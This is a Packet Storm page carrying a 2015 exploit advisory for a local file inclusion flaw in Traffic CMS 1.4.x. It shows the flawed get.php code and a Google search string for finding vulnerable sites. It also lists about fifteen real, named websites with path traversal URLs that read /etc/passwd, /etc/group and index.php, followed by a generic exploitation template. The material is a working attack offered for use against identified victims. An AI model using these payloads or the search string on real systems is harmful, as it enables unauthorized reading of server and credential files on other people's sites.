what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Traffic CMS 1.4.x Local File Inclusion

Traffic CMS 1.4.x Local File Inclusion
Posted Nov 20, 2015
Authored by KnocKout

Traffic CMS version 1.4.x suffers from a local file inclusion vulnerability.

tags | exploit, local, file inclusion
SHA-256 | 624c98b778717d19759cfb903dc4a9bfd8c1114710a9bd101578150c371516af

Traffic CMS 1.4.x Local File Inclusion

Change Mirror Download
                .__        _____        _______                
| |__ / | |___ __\ _ \_______ ____
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \
| Y \/ ^ /> <\ \_/ \ | \/\ ___/
|___| /\____ |/__/\_ \\_____ /__| \___ >
\/ |__| \/ \/ \/
_____________________________
/ _____/\_ _____/\_ ___ \
\_____ \ | __)_ / \ \/
/ \ | \\ \____
/_______ //_______ / \______ /
\/ \/ \/
Traffic CMS v1.4.x => Local File Inclusion Vulnerability
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com
[~] Þeker Insanlar : ZoRLu, ( milw00rm.com ),
Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, d4rkvisuaL, BlackEdition
DaiMon, PRoMaX, alpican, EthicalHacker, BurakGrs, LordERROR
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Traffic CMS
|~Affected Version : v1.4.x
|~Software : http://www.trafficwebsites.co.uk/ - https://www.facebook.com/trafficwebsites
|~RISK : Medium
|~Google Keyword : inurl:/admin/media/get.php ( developable )
|~Tested On : [L] Kali Linux \ [R] Example sites
#################### INFO ################################
makes it possible to read all the files from the local base.
#######################################################

### Error Line in 'get.php' ##
<?php
$ssl = true;
$file = $_GET['f'];
$path = UL_PATH;
$docs = array('doc','docx','xls','xlsx','pdf','zip','txt','rtf','ppt','pptx');
if (file_exists($path.$file))
{
$size = filesize($path.$file);
$contents = file_get_contents($path.$file);
$finfo = finfo_open(FILEINFO_MIME_TYPE);
$mime = finfo_file($finfo,$path.$file);
finfo_close($finfo);
if(in_array(file_ext($file), $docs))
..

########################################################
Tested on;
http://www.uha.london/admin/media/get.php?f=../../etc/group
https://www.unlimitedshop.co.uk/admin/media/get.php?f=../../etc/group
https://www.unlimitedshop.co.uk/admin/media/get.php?f=../index.php ()
http://www.ticktockrobot.co.uk/admin/media/get.php?f=../../etc/group
http://www.powerelectricservices.co.uk//admin/media/get.php?f=../../etc/group
http://www.knighthoodcorporate.com/admin/media/get.php?f=../../etc/group
http://www.nexusdp.co.uk/admin/media/get.php?f=../../etc/group
http://www.thespencepractice.co.uk/admin/media/get.php?f=../../etc/group
http://www.brightwell.fr/admin/media/get.php?f=../../../../../etc/passwd
http://www.brightwell.co.uk/admin/media/get.php?f=../../../../../etc/passwd
http://brightwell.es/admin/media/get.php?f=../../../../../etc/passwd
http://www.brightwell-inc.com/admin/media/get.php?f=../../../../../etc/passwd
http://www.talbottype.co.uk/admin/media/get.php?f=../../../../../etc/passwd
http://www.talbottype.co.uk/admin/media/get.php?f=../index.php
http://www.weddinginateacup.co.uk/admin/media/get.php?f=../../../etc/group
############################################################
Exploitation; http://$VICTIM/admin/media/get.php?f=[Local Path]
############################################################
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    0 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close